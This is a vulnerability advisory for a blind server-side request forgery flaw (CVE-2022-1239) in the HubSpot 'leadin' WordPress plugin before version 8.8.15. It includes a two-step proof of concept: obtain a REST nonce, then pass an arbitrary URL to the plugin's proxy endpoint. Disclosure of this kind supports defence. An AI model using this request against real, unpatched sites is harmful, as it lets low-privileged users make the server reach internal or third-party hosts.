WordPress Plugin Vulnerabilities

HubSpot < 8.8.15 - Contributor+ Blind SSRF

Description

The plugin does not validate the proxy URL given to the proxy REST endpoint, which could allow users with the edit_posts capability (by default contributor and above) to perform SSRF attacks

Proof of Concept

As an authenticated user with the edit_posts capability, get REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

https://example.com/wp-json/leadin/v1/[email protected]&_wpnonce=8aaf916bd9

Affects Plugins

Plugin icon
leadin
Fixed in 8.8.15

References

CVE
CVE-2022-1239

Classification

Type
SSRF
OWASP top 10
A1: Injection
CWE
CWE-918
CVSS
5.0 (medium)

Miscellaneous

Original Researcher
Brandon Roldan
Submitter
Brandon Roldan
Submitter website
https://tomorrowisnew.com
Submitter twitter
tomorrowisnew_
Verified
Yes
WPVDB ID
4ad2bb96-87a4-4590-a058-b03b33d2fcee

Timeline

Publicly Published
2022-04-11 (about 1 years ago)
Added
2022-04-11 (about 1 years ago)
Last Updated
2022-04-13 (about 1 years ago)

Other

Published
Title
Published
2022-04-19
Title
Fusion Builder < 3.6.2 - Unauthenticated SSRF
Published
2016-12-08
Title
Nelio AB Testing <= 4.5.8 - Server Side Request Forgery (SSRF)
Published
2023-05-30
Title
Download Monitor < 4.8.2 - Admin+ SSRF
Published
2022-10-27
Title
All in One SEO Pro < 4.2.6 - Admin+ SSRF
Published
2023-05-15
Title
Essential Addons for Elementor Pro < 5.4.9 - Unauthenticated SSRF